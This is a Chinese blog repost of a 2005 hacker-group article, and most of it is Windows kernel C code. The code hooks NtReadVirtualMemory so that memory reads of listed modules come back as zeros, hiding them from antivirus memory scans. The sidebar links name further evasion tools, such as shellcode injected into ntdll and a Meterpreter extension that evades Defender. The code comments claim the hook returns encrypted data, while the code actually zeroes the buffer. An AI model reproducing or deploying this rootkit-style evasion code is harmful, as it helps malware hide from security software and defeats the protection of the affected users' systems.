对抗杀毒软件的内存扫描

最新推荐文章于 2022-11-16 22:22:37 发布
最新推荐文章于 2022-11-16 22:22:37 发布
阅读量985 收藏
点赞数
分类专栏: web技术 文章标签: 杀毒软件 table buffer list exception date
对抗杀毒软件的内存扫描 (转)   [ 日期: 2006-05-17 01:07 | 作者: d99 | 来自: | 晴天 | 心情指数: +2 ] 
Author: Polymorphours
Email: Polymorphours@whitecell.org
Homepage:http://www.whitecell.org 
Date: 2005-11-17

/*++
Author: Polymorphours

Date: 2005/1/10

通过对 NtReadVirtualMemory 挂钩,防止其他进程对保护的模块进行扫描,
如果发现其他进程读被保护模块的内存,则返回0

--*/

typedef struct _LDR_DATA_TABLE_ENTRY {

LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;


/*
+0x034 Flags : Uint4B
+0x038 LoadCount : Uint2B
+0x03a TlsIndex : Uint2B
+0x03c HashLinks : _LIST_ENTRY
+0x03c SectionPointer : Ptr32 Void
+0x040 CheckSum : Uint4B
+0x044 TimeDateStamp : Uint4B
+0x044 LoadedImports : Ptr32 Void
+0x048 EntryPointActivationContext : Ptr32 Void
+0x04c PatchInformation : Ptr32 Void 
*/
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

/*++

函数名: MyNtReadVirtualMemory

参数:
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL

功能:
隐藏保护模块的内存,如果发现有内存扫描到这块内存,则返回加密后的数据扰乱扫描过程

返回:
NTSTATUS

--*/

NTSTATUS
MyNtReadVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
OUT PVOID Buffer,
IN ULONG BufferLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS status;
PEPROCESS eProcess;
PVOID Peb;

PPEB_LDR_DATA PebLdrData;
PLDR_DATA_TABLE_ENTRY LdrDataTableHeadList;
PLDR_DATA_TABLE_ENTRY LdrDataTableEntry;

PLIST_ENTRY Blink;
PPROTECT_NODE FileNode = NULL;
BOOLEAN bHideFlag = FALSE;
ULONG ImageMaxAddress = 0;

/*
#ifdef _DEBUG
DbgPrint( "Call Process: %s, BaseAddress: %08x/n", PsGetProcessImageFileName( PsGetCurrentProcess() ), BaseAddress );
#endif
*/

status =ObReferenceObjectByHandle(
ProcessHandle,
FILE_READ_DATA,
PsProcessType,
KernelMode,
(PVOID)&eProcess,
NULL
);
if ( NT_SUCCESS(status) ) {

//
// 得到PEB的地址
//

Peb = (PVOID)(*(PULONG)((PCHAR)eProcess + PebOffset));

//
// 切换到目标进程空间
//


KeAttachProcess( eProcess );

//
// 判断PEB是否有效,如果有效,那么准备利用PEB结构遍历进程加载的模块
//

if ( !MmIsAddressValid( Peb ) ) {

/*
#ifdef _DEBUG
DbgPrint( "PEB is error./n" );
#endif
*/

KeDetachProcess();
ObDereferenceObject( eProcess );

goto CLEANUP;
}

PebLdrData = (PPEB_LDR_DATA)(*(PULONG)( (PCHAR)Peb + 0xc ));

if ( !PebLdrData ) {

KeDetachProcess();
ObDereferenceObject( eProcess );

goto CLEANUP;
}

try {

ProbeForRead ( 
PebLdrData,
sizeof(PEB_LDR_DATA),
sizeof(ULONG)
);

//
// 遍历模块链表
//

LdrDataTableHeadList = (PLDR_DATA_TABLE_ENTRY)PebLdrData->InLoadOrderModuleList.Flink;
LdrDataTableEntry = LdrDataTableHeadList;


do {

ProbeForRead(
LdrDataTableEntry,
sizeof(LDR_DATA_TABLE_ENTRY),
sizeof(ULONG)
);

if ( !LdrDataTableEntry->DllBase ) {

LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue; 
}


//
// 判断读的内存属于那一个模块,如果都不属于,那么放过
//

ImageMaxAddress = (ULONG)((ULONG)LdrDataTableEntry->DllBase + LdrDataTableEntry->SizeOfImage);

if ( (ULONG)( (ULONG)BaseAddress + BufferLength) < (ULONG)LdrDataTableEntry->DllBase ||
(ULONG)BaseAddress > ImageMaxAddress ) {

//
// 如果不是读模块区域,那么枚举下一个
// 

LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;
continue; 
}

//
// 如果是被保护的模块,那么返回虚假数据
//

bHideFlag = FALSE;
Blink = ProtectFile.Blink;


while ( Blink != &ProtectFile ) {

FileNode = CONTAINING_RECORD( Blink, PROTECT_NODE, ActiveLink );

//
// 如果发现当前文件存在于隐藏列表,那么设置隐藏标志隐藏它
//

if ( wcsstr( FileNode->ProtectName, LdrDataTableEntry->FullDllName.Buffer ) ) {

bHideFlag = TRUE;
break;
}

Blink = Blink->Blink;
}

if ( bHideFlag ) {

//
// 返回原本的进程空间进行处理
//

KeDetachProcess();
ObDereferenceObject( eProcess );

ProbeForWrite(
Buffer,
BufferLength,
sizeof(ULONG)
);

memset( Buffer, 0x00, BufferLength );

ProbeForWrite(
ReturnLength,
sizeof(PULONG),
sizeof(ULONG)
);

*ReturnLength = BufferLength;

return STATUS_SUCCESS;
}

LdrDataTableEntry = (PLDR_DATA_TABLE_ENTRY)LdrDataTableEntry->InLoadOrderLinks.Flink;

} while ( LdrDataTableEntry != LdrDataTableHeadList );


} except( EXCEPTION_EXECUTE_HANDLER ) {

if ( !bHideFlag ) {

KeDetachProcess();
ObDereferenceObject( eProcess );
}

goto CLEANUP;
}

KeDetachProcess();
ObDereferenceObject( eProcess );
}

CLEANUP:

return NtReadVirtualMemory(
ProcessHandle,
BaseAddress,
Buffer,
BufferLength,
ReturnLength
);
}

Whitecell Security Systems,一个非营利性民间技术组织,致力于各种系统安全技术的研究。坚持传统的hacker精神,追求技术的精纯。
Whitecell Website:http://www.whitecell.org/ 
Whitecell Forum:http://www.whitecell.org/forum/



 
古剑楠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
逃避内存扫描
01-20
逃避内存扫描,在ntdll末尾2kb插入shellcode的技术....
对抗杀毒软件内存扫描源代码NT内核进程调度分析笔记.rar
04-27
本文档“对抗杀毒软件内存扫描源代码NT内核进程调度分析笔记”深入探讨了如何利用Windows NT内核的特性来规避杀毒软件内存扫描。 首先,NT内核是Windows操作系统的核心,负责管理系统的硬件资源、进程和线程调度...
[转载]对抗杀毒软件内存扫描
weixin_30438813的博客
08-18 82
信息来源:whitecell文章作者:Polymorphours---------------------Author: PolymorphoursEmail: Polymorphours@whitecell.orgHomepage:http://www.whitecell.org Date: 2005-11-17/*++ Author: Polymorphours ...
扫描进程内存需要注意加锁
Tommy(凌飞)的专栏
01-30 2094
<br />      最近在搞扫描进程内存部门,但是偶尔会出现蓝屏的问题,经过分析是进程已退出,但是还是在对这个进程扫描。其中在扫描之前,需要attach到这个进程上去的,但是为什么会出现这样的一个情况呢。首先我查看了wrk,rectos和nt4,也使用windbg分析了进程结束和读取进程内存部分的代码。发现ms在对进程结束之前会去获取一个进程锁,其中在PspExitThread一开始,会发现这个地方一开始就要检测进程是否被attach上了,如果坚持的就立马回调用bugcheck的。为了尽量的避免这样的蓝
小巧杀毒软件代码
08-26
杀毒软件基础原理】 杀毒软件是一种计算机安全软件,主要功能是检测、清除或隔离电脑中的病毒、间谍软件...然而,实际的杀毒软件开发需要考虑更多的安全性和性能问题,如多线程扫描内存安全以及对未知威胁的御。
易语言杀毒软件源码
09-14
6. **更新机制**:为了对抗新出现的病毒,杀毒软件需要定期更新病毒库。源码可能包含自动更新的代码,如通过HTTP或FTP下载更新文件。 7. **日志记录**:杀毒软件通常会记录扫描和处理结果,便于用户查看和分析。...
菜鸟也会编杀毒软件
12-13
3. **内存扫描**:除了静态扫描硬盘上的文件,杀毒软件还需要能够扫描内存中的进程,因为某些病毒会驻留在内存中以逃避检测。 4. **网络护**:考虑到病毒和恶意软件的网络传播,杀毒软件需要具备拦截和分析网络...
一个商品化的杀毒软件源代码
06-17
反病毒引擎可能包括多个模块,如文件扫描器、内存扫描器、邮件扫描器等,分别针对不同类型的威胁。 2. **实时保护**:实时保护功能会在用户操作电脑时持续监控,止恶意活动。源代码中应包含这部分的实现,可能...
Ninjasploit:Meterpreter扩展,用于应用钩子以避免Windows Defender内存扫描
03-08
Ninjasploit:Meterpreter扩展,用于应用钩子以避免Windows Defender内存扫描
石像鬼:一种内存扫描规避技术
02-05
石像鬼:一种内存扫描规避技术
9种通用杀毒软件内存之对比
05-06
九种通用杀毒软件内存的对比,NOD32、趋势、比特梵得、金山、江民、赛门铁克、瑞星、卡巴斯基、麦咖啡,分别记录了静默状态和扫描状态下所占内存量(单位:M)。
免杀-绕过内存扫描
weixin_44747030的博客
11-16 1472
免杀-绕过内存扫描
内核遍历PEB下的LDR模块表
09-18 2419
系统:XP SP2 可以通过EPROCESS ---> PEB ---> _PRB_LDR_DATA  kd> dt _eprocess ntdll!_EPROCESS +0x000 Pcb : _KPROCESS +0x06c ProcessLock : _EX_PUSH_LOCK +0x070 CreateTime
一种躲避运行时代码校验的方法
06-24 996
作 者: NetRoc时 间: 2008-01-25,15:16链 接: http://bbs.pediy.com/showthread.php?t=58896一种躲避运行时代码校验的方法cc682/NetRoc关键字:代码校验,内存补丁,hook    我们有时候需要对运行中的程序打内存补丁,或者对它的代码挂一些钩子之类的工作。但是现在相当多软件进行了运行
Windows下基础免杀技术
MachineGunJoe666
09-04 1645
例如,CS可以直接生成各种格式的shellcode。
WindowsVista的治恶意软体技术.pptx
最新发布
11-21
Windows Vista是微软公司推出的一款操作系统,它在安全方面相较于之前的系统版本有了显著的提升,特别是在御恶意软件(Malware)方面。恶意软件是一类未经用户授权就在计算机上执行操作的应用程序,包括病毒、蠕虫...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值